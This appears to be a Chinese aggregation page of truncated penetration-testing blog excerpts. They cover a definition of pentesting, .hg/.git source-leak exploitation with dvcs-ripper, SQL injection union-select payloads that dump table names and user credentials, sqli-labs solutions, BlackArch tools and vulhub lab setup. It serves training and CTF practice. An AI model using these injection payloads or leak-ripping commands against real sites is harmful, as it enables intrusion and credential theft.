一.渗透测试是什么 渗透测试(PenetrationTest)是对安全情况最客观.最直接的评估方式,主要是模拟黑客的攻击方法对系统和网络进行非破坏性质的攻击性测试,在保证整个渗透测试过程都在可以控制和调整的范围之内尽可能的获取目标信息系统的管理权限以及敏感信息,并将入侵的过程和细节产生报告给用户,由此证实用户系统所存在的安全威胁和风险,并能及时提醒安全管理员完善安全策略. 渗透测试是工具扫描和人工评估的重要补充.工具扫描具有很好的效率和速度,但是存在一定的误报率,不能发现高层次.复杂的安全问题:…

来自:http://www.hacksec.cn/Penetration-test/474.html 摘要 背景 本文主要是记录一下常见的源码泄漏问题,这些经常在web渗透测试以及CTF中出现. .hg源码泄漏 漏洞成因:   hg init的时候会生成.hg e.g.http://www.example.com/.hg/ 漏洞利用:   工具: dvcs-ripper rip-hg.pl -v -u http://www.example.com/.hg/ .git源码泄漏 漏洞成因:   在运…

SQL注入 1.sqli数字型 判断是否存在注入点,执行1 and 1=1,有回显判断存在注入点 判断字段数,执行1 order by 3以及执行1 order by 4时报错,判断字段数为3 判断具体回显位,执行-1 union select 1,2,3 判断数据库名和当前用户名,执行-1 union select 1,database(),user() 执行 -1 union select 1,(select group_concat(table_name) from information…

BlackArch-Tools 简介 安装在ArchLinux之上添加存储库从blackarch存储库安装工具替代安装方法BlackArch Linux Complete Tools List 简介 BlackArch Linux是针对渗透测试人员和安全研究人员的基于Arch Linux的渗透测试分发版.BlackArch Linux预装有上千种专用工具以用于渗透测试和计算机取证分析.BlackArch Linux与现有的Arch安装兼容.您可以单独或成组安装工具.https://blackar…

搭建与安装 参考:https://www.fujieace.com/penetration-test/sqli-labs-ec.html 下载:sqli-labs下载 第一关:单引号报错注入 ?id=-1' union select 1,(select group_concat(username,0x3a,password) from security.users),3--+ 第二关:数值型报错注入 ?id=100 union select 1,(select group_concat(user…

阿里云服务器搭建vulhub靶场 环境 服务器:阿里云服务器 系统:centos7 应用:vulhub 步骤 vulhub需要依赖docker搭建,首先安装docker. 使用以下方法之一: # curl -s https://get.docker.com/ | sh # sudo apt install docker.io 安装完成之后,查看版本号验证. # docker version 然后安装docker-compose. # pip install docker-compose 如果提示…